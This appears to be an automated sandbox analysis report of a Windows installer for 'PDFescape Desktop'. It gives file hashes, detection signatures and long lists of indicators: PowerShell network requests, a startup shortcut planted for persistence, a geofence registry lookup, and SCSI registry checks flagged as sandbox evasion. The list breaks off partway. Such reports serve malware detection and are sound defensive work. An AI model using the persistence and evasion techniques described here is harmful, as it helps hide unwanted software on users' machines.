Resubmissions
08-06-2021 18:11
210608-f4tsl5dzma 10Analysis
-
max time kernel
1799s -
max time network
1803s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
08-06-2021 18:11
Static task
static1
General
-
Target
8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.exe
-
Size
107.7MB
-
MD5
e4b18058271e4c9bfc7e3759a6132437
-
SHA1
70248c40ca94932a7f098a26ee7858bda5903d73
-
SHA256
8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1
-
SHA512
4bf709dc7e3e32d7a694732b60150ea97b834465a8074d6b3d4acab0633d3e6f2a96d211f04c58397032bf60e8b4e172c775c95b3afe8765f8e2f1b650c6a045
Malware Config
Signatures
-
Registers COM server for autorun 1 TTPs
-
Blocklisted process makes network request 20 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeflow pid process 37 4132 powershell.exe 45 3992 powershell.exe 46 4476 powershell.exe 47 4172 powershell.exe 48 4400 powershell.exe 49 3948 powershell.exe 53 4256 powershell.exe 56 2744 powershell.exe 57 2332 powershell.exe 62 4332 powershell.exe 49 3948 powershell.exe 48 4400 powershell.exe 47 4172 powershell.exe 56 2744 powershell.exe 45 3992 powershell.exe 53 4256 powershell.exe 62 4332 powershell.exe 57 2332 powershell.exe 37 4132 powershell.exe 46 4476 powershell.exe -
Executes dropped EXE 11 IoCs
Processes:
8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmpPDFescape_Desktop_Installer.exePDFescapeDesktopInstaller.exews.exeupdater-ws.exeprinter-installer-app.execreator-app.execreator-ws.exeescape.exews.exeupdater-ws.exepid process 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp 3564 PDFescape_Desktop_Installer.exe 3808 PDFescapeDesktopInstaller.exe 16564 ws.exe 11140 updater-ws.exe 13076 printer-installer-app.exe 8596 creator-app.exe 10820 creator-ws.exe 11444 escape.exe 4856 ws.exe 16656 updater-ws.exe -
Registers new Print Monitor 2 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
PDFescape_Desktop_Installer.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation PDFescape_Desktop_Installer.exe -
Drops startup file 10 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk powershell.exe File created C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk powershell.exe -
Loads dropped DLL 64 IoCs
Processes:
8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmpregsvr32.exeDllHost.exePDFescape_Desktop_Installer.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exews.exeMsiExec.exeupdater-ws.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exeprinter-installer-app.exespoolsv.execreator-app.execreator-ws.exeescape.exepid process 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp 2104 regsvr32.exe 400 DllHost.exe 3564 PDFescape_Desktop_Installer.exe 10120 MsiExec.exe 7700 MsiExec.exe 7700 MsiExec.exe 7700 MsiExec.exe 7700 MsiExec.exe 10824 MsiExec.exe 13416 MsiExec.exe 16564 ws.exe 16564 ws.exe 16564 ws.exe 16564 ws.exe 16564 ws.exe 16564 ws.exe 16564 ws.exe 8076 MsiExec.exe 11140 updater-ws.exe 11140 updater-ws.exe 11140 updater-ws.exe 11140 updater-ws.exe 11140 updater-ws.exe 11140 updater-ws.exe 11140 updater-ws.exe 19072 MsiExec.exe 11876 MsiExec.exe 14080 MsiExec.exe 17588 MsiExec.exe 2792 MsiExec.exe 7012 MsiExec.exe 12332 MsiExec.exe 13076 printer-installer-app.exe 2016 13476 spoolsv.exe 13476 spoolsv.exe 13476 spoolsv.exe 8596 creator-app.exe 8596 creator-app.exe 8596 creator-app.exe 8596 creator-app.exe 8596 creator-app.exe 10820 creator-ws.exe 10820 creator-ws.exe 10820 creator-ws.exe 11444 escape.exe 11444 escape.exe 11444 escape.exe 11444 escape.exe 11444 escape.exe 11444 escape.exe 11444 escape.exe 11444 escape.exe 11444 escape.exe 11444 escape.exe 11444 escape.exe 11444 escape.exe 11444 escape.exe 11444 escape.exe 11444 escape.exe 11444 escape.exe 11444 escape.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe -
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
-
Drops file in System32 directory 11 IoCs
Processes:
spoolsv.exemsiexec.exeprinter-installer-app.exedescription ioc process File created C:\Windows\system32\spool\DRIVERS\x64\3\New\pdfescape desktop_pdfprnui_v.4.12.26.3.hlp spoolsv.exe File opened for modification C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprn_v.4.12.26.3.dll spoolsv.exe File opened for modification C:\Windows\SysWOW64\msvcp140_2.dll msiexec.exe File created C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprnui_v.4.12.26.3.dll printer-installer-app.exe File created C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfpmon_v.4.12.26.3.dll printer-installer-app.exe File created C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprnui_v.4.12.26.3.hlp printer-installer-app.exe File created C:\Windows\system32\spool\DRIVERS\x64\3\New\pdfescape desktop_pdfprnui_v.4.12.26.3.dll spoolsv.exe File created C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprn_v.4.12.26.3.dll printer-installer-app.exe File created C:\Windows\system32\spool\DRIVERS\x64\3\New\pdfescape desktop_pdfprn_v.4.12.26.3.dll spoolsv.exe File opened for modification C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprnui_v.4.12.26.3.hlp spoolsv.exe File opened for modification C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprnui_v.4.12.26.3.dll spoolsv.exe -
Drops file in Program Files directory 64 IoCs
Processes:
msiexec.exedescription ioc process File created C:\Program Files\PDFescape Desktop\plugins\plugin-review.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\Adobe-Japan1-H-Mac msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\CNS07-RKSJ-H msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\UniKS-UCS2-V msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\Encodings\JohabEncoding msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\de\void.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\fr\approved.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\en\void.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\it\not-for-public-release.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\pt\sold.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\ru\for-public-release.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\D3DCompiler_43.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\icuuc63.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\localization-service.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\HKdla-B5-H msiexec.exe File created C:\Program Files\PDFescape Desktop\plugins-manager.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\localization\it\messages.dat msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\Adobe-CNS1-UCS2 msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\es\information-only.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\ui-sign.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\localization\pt\icon.png msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\Templates\StickerPressed msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\resources\Core\Encodings\AdobeLatin1Encoding msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\ja\experimental.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\ja\information-only.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\ja\sold.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\Adobe-GB1-H-CID msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\Adobe-Japan1-H-CID msiexec.exe File created C:\Program Files\PDFescape Desktop\curl-ca-bundle.crt msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\root-service-provider.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\es\sold.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\UniKS-UTF32-H msiexec.exe File created C:\Program Files\PDFescape Desktop\plugins\plugin-edit.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\es\expired.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\fr\not-approved.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\localization\en\info.json msiexec.exe File created C:\Program Files\PDFescape Desktop\libcurl.dll msiexec.exe File opened for modification C:\Program Files\PDFescape Desktop\encoding-conversion.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\localization\pt\info.json msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\resources\Core\Templates\StickerNormal msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\pt\for-public-release.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\ETenms-B5-H msiexec.exe File created C:\Program Files\PDFescape Desktop\libcrypto-1_1-x64.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\ui-token.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\creator-ws.exe msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\Adobe-CNS1-4 msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\Adobe-Japan1-90pv-RKSJ msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\UniJIS-UCS2-H msiexec.exe File created C:\Program Files\PDFescape Desktop\web-link-store.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\en\completed.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\fr\for-public-release.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\UCS2-GBpc-EUC msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\es\approved.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\ru\experimental.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\bl-forms-module.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\ru\for-comment.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\ru\sold.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\resources\Core\Encodings\JohabEncoding msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\fr\final.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\fr\for-comment.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\ja\for-comment.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\83pv-RKSJ-H msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\UniCNS-UTF32-H msiexec.exe File created C:\Program Files\PDFescape Desktop\localization\fr\info.json msiexec.exe -
Drops file in Windows directory 64 IoCs
Processes:
msiexec.exedescription ioc process File created C:\Windows\Installer\{8B686E57-76A7-4330-A981-4AB69DF7A568}\main_icon msiexec.exe File created C:\Windows\Installer\{B9EB4384-5195-4ED6-BAB0-661FC5B36E14}\create_icon msiexec.exe File created C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\review_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 msiexec.exe File created C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\secure_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 msiexec.exe File created C:\Windows\Installer\{87391E47-A919-4E89-8D07-EA259AD63DB8}\convert_icon msiexec.exe File opened for modification C:\Windows\Installer\{87391E47-A919-4E89-8D07-EA259AD63DB8}\convert_icon msiexec.exe File opened for modification C:\Windows\Installer\{D81F9B76-24DE-4DFF-8869-B31289B36FAC}\convert_icon msiexec.exe File opened for modification C:\Windows\Installer\{CC6DC81A-06C1-4933-8117-794710375AD3}\uninstall_icon msiexec.exe File created C:\Windows\Installer\{00CEFC51-9626-4E7E-920B-4757DF0B9491}\create_icon msiexec.exe File created C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\review_icon msiexec.exe File opened for modification C:\Windows\Installer\f750b38.msi msiexec.exe File created C:\Windows\Installer\{CC6DC81A-06C1-4933-8117-794710375AD3}\install_icon msiexec.exe File opened for modification C:\Windows\Installer\{00CEFC51-9626-4E7E-920B-4757DF0B9491}\insert_icon msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\vccorlib140.dll.56E049E7_36C3_3941_98AD_414884F67502 msiexec.exe File created C:\Windows\Installer\SourceHash{42EF2557-7C52-40EE-81CF-B658B64C7095} msiexec.exe File created C:\Windows\Installer\f750b44.msi msiexec.exe File opened for modification C:\Windows\Installer\{8B686E57-76A7-4330-A981-4AB69DF7A568}\install_icon msiexec.exe File opened for modification C:\Windows\Installer\f750b48.msi msiexec.exe File opened for modification C:\Windows\Installer\{00CEFC51-9626-4E7E-920B-4757DF0B9491}\enterprise_icon msiexec.exe File created C:\Windows\Installer\f750b4f.msi msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\concrt140.dll.56E049E7_36C3_3941_98AD_414884F67502 msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\msvcp140_1.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8 msiexec.exe File opened for modification C:\Windows\Installer\MSI548D.tmp msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24 msiexec.exe File opened for modification C:\Windows\Installer\{D81F9B76-24DE-4DFF-8869-B31289B36FAC}\install_icon msiexec.exe File created C:\Windows\Installer\{8B686E57-76A7-4330-A981-4AB69DF7A568}\convert_icon msiexec.exe File opened for modification C:\Windows\Installer\{8B686E57-76A7-4330-A981-4AB69DF7A568}\convert_icon msiexec.exe File opened for modification C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\asian_icon msiexec.exe File opened for modification C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\business_icon msiexec.exe File created C:\Windows\Installer\f750b30.msi msiexec.exe File created C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\ocr_icon msiexec.exe File created C:\Windows\Installer\{D81F9B76-24DE-4DFF-8869-B31289B36FAC}\main_icon msiexec.exe File opened for modification C:\Windows\Installer\f750b44.msi msiexec.exe File created C:\Windows\Installer\{00CEFC51-9626-4E7E-920B-4757DF0B9491}\asian_icon msiexec.exe File opened for modification C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\insert_icon msiexec.exe File opened for modification C:\Windows\Installer\{42EF2557-7C52-40EE-81CF-B658B64C7095}\secure_icon msiexec.exe File created C:\Windows\Installer\{D81F9B76-24DE-4DFF-8869-B31289B36FAC}\edit_icon msiexec.exe File created C:\Windows\Installer\{CC6DC81A-06C1-4933-8117-794710375AD3}\review_icon msiexec.exe File created C:\Windows\Installer\{00CEFC51-9626-4E7E-920B-4757DF0B9491}\uninstall_icon msiexec.exe File created C:\Windows\Installer\{00CEFC51-9626-4E7E-920B-4757DF0B9491}\review_icon msiexec.exe File created C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\asian_icon msiexec.exe File created C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\edit_icon msiexec.exe File opened for modification C:\Windows\Installer\{00CEFC51-9626-4E7E-920B-4757DF0B9491}\edit_icon msiexec.exe File opened for modification C:\Windows\Installer\{00CEFC51-9626-4E7E-920B-4757DF0B9491}\secure_icon msiexec.exe File opened for modification C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\secure_icon msiexec.exe File opened for modification C:\Windows\Installer\{42EF2557-7C52-40EE-81CF-B658B64C7095}\install_icon msiexec.exe File opened for modification C:\Windows\Installer\{87391E47-A919-4E89-8D07-EA259AD63DB8}\business_icon msiexec.exe File opened for modification C:\Windows\Installer\{CC6DC81A-06C1-4933-8117-794710375AD3}\business_icon msiexec.exe File created C:\Windows\Installer\f750b47.msi msiexec.exe File opened for modification C:\Windows\Installer\{00CEFC51-9626-4E7E-920B-4757DF0B9491}\ocr_icon msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\msvcp140.dll.56E049E7_36C3_3941_98AD_414884F67502 msiexec.exe File opened for modification C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\main_icon msiexec.exe File opened for modification C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\asian_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 msiexec.exe File created C:\Windows\Installer\f750b43.msi msiexec.exe File created C:\Windows\Installer\{B9EB4384-5195-4ED6-BAB0-661FC5B36E14}\convert_icon msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\msvcp140_2.dll.56E049E7_36C3_3941_98AD_414884F67502 msiexec.exe File created C:\Windows\Installer\{42EF2557-7C52-40EE-81CF-B658B64C7095}\edit_icon msiexec.exe File created C:\Windows\Installer\{42EF2557-7C52-40EE-81CF-B658B64C7095}\forms_icon msiexec.exe File opened for modification C:\Windows\Installer\{8B686E57-76A7-4330-A981-4AB69DF7A568}\insert_icon msiexec.exe File created C:\Windows\Installer\{8B686E57-76A7-4330-A981-4AB69DF7A568}\secure_icon msiexec.exe File created C:\Windows\Installer\f750b2f.msi msiexec.exe File created C:\Windows\Installer\{42EF2557-7C52-40EE-81CF-B658B64C7095}\review_icon msiexec.exe File created C:\Windows\Installer\{87391E47-A919-4E89-8D07-EA259AD63DB8}\ocr_icon msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\msvcp140.dll.56E049E7_36C3_3941_98AD_414884F67502 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exespoolsv.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID spoolsv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{f01fac5d-e5f6-485f-a8c6-27446425998c}\0002 spoolsv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened 